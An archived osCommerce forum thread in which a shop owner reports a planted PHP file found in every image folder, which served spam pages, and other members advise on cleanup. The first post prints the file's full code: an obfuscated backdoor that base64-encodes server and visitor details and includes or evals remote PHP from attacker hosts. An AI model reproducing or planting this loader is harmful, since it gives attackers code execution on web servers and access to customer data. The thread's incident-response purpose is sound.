Jump to content

Archived

This topic is now archived and is closed to further replies.

NimaP

jesus i think my site has been hijacked!

Recommended Posts

i have several sites all with oscommerce in some form (some are hybrid site). Anyways i noticed someone made an account on my new site that i'm putting together, so i was a little curious how they found me. i did a search for the domain on google and came up with the listings looking like this:

 

xspider network
xspider network, ARCADE COBRA COMAND, patch calendar commander, kukriniksi biography, spiderman 3 no cd crack, rundll dovnload, download free crack for lula ...
www.**************.com/images/infobox/xspider-network.html - 8k - Cached - Similar pages - Note this

nancy sinatra rapidshare
nancy sinatra rapidshare, download crack warcraft 3 frozen throne no cd 1.20 c, 3d analyze punisher, ultimate surrender full download, nubiles charlie ...
www.**************.com/images/infobox/nancy-sinatra-rapidshare.html - 8k - Cached - Similar pages - Note this

lfs 2 mechanic download
lfs 2 mechanic download, warcraft 3 v.1.20b no-cd, bcad version 3.7, free serial or patch for dr.divx 2.0.0 beta 6, backdoor patch crack, download full ...
www.**************.com/images/infobox/lfs-2-mechanic-download.html - 8k - Cached - Similar pages - Note this

 

So i looked in my images/infobox folder and i saw some arrow image files and a php file called "213378.php" So i looked around and they're in every image fold i have! there is one per folder and they are in the catalog/image/... and catalog/admin/... of my site and every other site i have. I downloaded a fresh copy of OSC to make sure these files didn't come with OSC and they didn't.

 

the file contains the following code

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>

 

when i run it, i get a url not found page just like in the search engines. please help...how can i protect myself?! i password protect everything.

 

Also doing a search for similar /images/infobox/... links like the ones that showed up for me produced a ton of OSC sites that have these fake listing pages popup.

Share this post


Link to post
Share on other sites

First thing you need to do is Change all of the passwords on your hosting account, all FTP, Cpanel, etc etc etc...

 

What version of OSC are you using?

 

What Contributions have you installed?

 

You need to delete every file, and reupload a KNOWN SAFE backup, or a new download from here...

 

 

This script send identifying information to a remote host, and has the potential of executing php including accessing your database and getting customer data....

 

It is requesting a file from

 

a.rsdcraft.ws

ad.runweb.info

7.xmldata.info/?

 

I found one other site hacked with this script, they traced it back to a a unpatch php security hole, so make sure your server is running the lastest php version...

 

Also make sure your permissions are correct. Only have write turned on in temp and public upload dir, turn write permissions OFF unless your changing things..

Share this post


Link to post
Share on other sites
First thing you need to do is Change all of the passwords on your hosting account, all FTP, Cpanel, etc etc etc...

 

What version of OSC are you using?

 

What Contributions have you installed?

 

You need to delete every file, and reupload a KNOWN SAFE backup, or a new download from here...

This script send identifying information to a remote host, and has the potential of executing php including accessing your database and getting customer data....

 

It is requesting a file from

 

a.rsdcraft.ws

ad.runweb.info

7.xmldata.info/?

 

I found one other site hacked with this script, they traced it back to a a unpatch php security hole, so make sure your server is running the lastest php version...

 

Also make sure your permissions are correct. Only have write turned on in temp and public upload dir, turn write permissions OFF unless your changing things..

 

 

I have some sites that are MS2 and some that are RC2. Both are hit.

 

I have a HUGE list of contributions installed on some of these sites. I looked back at my last 2 backups which is a month of data, and the files are in the backups. I went ahead and deleted every known file of this script i could find. I also just changed all my passwords to the ftp, database, folder protection, osc account login.

Share this post


Link to post
Share on other sites
I have some sites that are MS2 and some that are RC2. Both are hit.

 

I have a HUGE list of contributions installed on some of these sites. I looked back at my last 2 backups which is a month of data, and the files are in the backups. I went ahead and deleted every known file of this script i could find. I also just changed all my passwords to the ftp, database, folder protection, osc account login.

You should ask your webhosts how these attacks were successful.


The Coopco Underwear Shop

 

If you live to be 100 years of age, that means you have lived for 36,525 days. Don't waste another, there aren't many left.

Share this post


Link to post
Share on other sites

If your hosts are using a version of PHP with known vulnerabilities, then the site could be hacked again.

 

If your hosts provide cPanel and other sites on the server have been hacked then your site will be hacked again - because cPanel has no jailed root for websites (hack one, hack them all!).

 

Vger

Share this post


Link to post
Share on other sites
If your hosts are using a version of PHP with known vulnerabilities, then the site could be hacked again.

 

If your hosts provide cPanel and other sites on the server have been hacked then your site will be hacked again - because cPanel has no jailed root for websites (hack one, hack them all!).

 

Vger

i think this condition is called local attack . Threre are many server is hacked like that.

---------------

Lary Man

Share this post


Link to post
Share on other sites

As far as I know this "hack" is because the images folder has "777" permissions.

 

They should be no higher than "755"


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

×